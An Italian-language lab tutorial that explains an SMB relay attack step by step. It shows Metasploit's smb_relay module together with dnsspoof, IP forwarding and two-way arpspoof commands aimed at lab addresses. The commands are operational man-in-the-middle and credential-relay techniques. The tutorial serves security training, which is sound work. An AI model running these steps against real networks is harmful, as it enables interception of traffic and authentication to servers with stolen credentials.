Tutorials

Msfconsole

Guida Approfondita all'SMB Relay Attack con Metasploit Il seguente documento descrive passo dopo passo un attacco SMB Relay, evidenziando i comandi utilizzati nel contesto di un laboratorio e spiegand

#exploitation#windows#smb#metasploit

Guida Approfondita all'SMB Relay Attack con Metasploit

Il seguente documento descrive passo dopo passo un attacco SMB Relay, evidenziando i comandi utilizzati nel contesto di un laboratorio e spiegando ogni fase dell'attacco in dettaglio.


1. Cos'è un SMB Relay Attack?

Un SMB Relay Attack sfrutta la mancanza di firma nei pacchetti SMB per intercettare e inoltrare le credenziali tra due host. L'attaccante si pone tra una vittima e un server, inoltrando le richieste SMB in modo da autenticarsi sul server di destinazione con le credenziali della vittima.


2. Preparazione dell'ambiente con Metasploit

Comando:

bash
msfconsole
use exploit/windows/smb/smb_relay

Spiegazione:

  • Si avvia Metasploit.
  • Si seleziona il modulo exploit/windows/smb/smb_relay che consente di inoltrare le richieste SMB intercettate.

3. Manipolazione del DNS (DNS Spoofing)

Comando:

bash
echo "172.16.5.101 *.sportsfoo.com" > dns

Spiegazione:

  • Viene creato un file chiamato dns che forza qualsiasi sottodominio di sportsfoo.com a risolvere l'indirizzo IP 172.16.5.101, ovvero quello dell'attaccante.

Comando:

bash
dnsspoof -i eth1 -f dns

Spiegazione:

  • Si utilizza dnsspoof per rispondere alle richieste DNS sulla scheda di rete eth1 con l'IP fittizio specificato nel file dns.

4. Abilitazione dell'IP forwarding

Comando:

bash
echo 1 > /proc/sys/net/ipv4/ip_forward

Spiegazione:

  • Permette al sistema attaccante di inoltrare pacchetti tra le due interfacce di rete, comportamento necessario per effettuare un attacco "man-in-the-middle".

5. Avvio dell'ARP Spoofing

Comandi:

bash
arpspoof -i eth1 -t 172.16.5.5 172.16.5.1
arpspoof -i eth1 -t 172.16.5.1 172.16.5.5

Spiegazione:

  • Questi due comandi convincono il client (172.16.5.5) e il gateway (172.16.5.1) che l'attaccante è l'altro interlocutore.
  • Il risultato è che tutto il traffico tra questi due host passa attraverso l'attaccante, che può intercettare le richieste SMB.

6. Conclusione dell'attacco

A questo punto, il modulo smb_relay di Metasploit dovrebbe essere pronto a ricevere una connessione SMB dalla vittima, inoltrarla al server e autenticarsi con le credenziali della vittima. Questo può consentire l'accesso remoto o l'esecuzione di comandi sul server di destinazione, a seconda della configurazione e delle vulnerabilità presenti.


Nota Bene: Questo tipo di attacco funziona solo se SMB Signing non è abilitato sul server. L'uso di tale tecnica è lecito solo in contesti di laboratorio o con autorizzazione esplicita per test di sicurezza.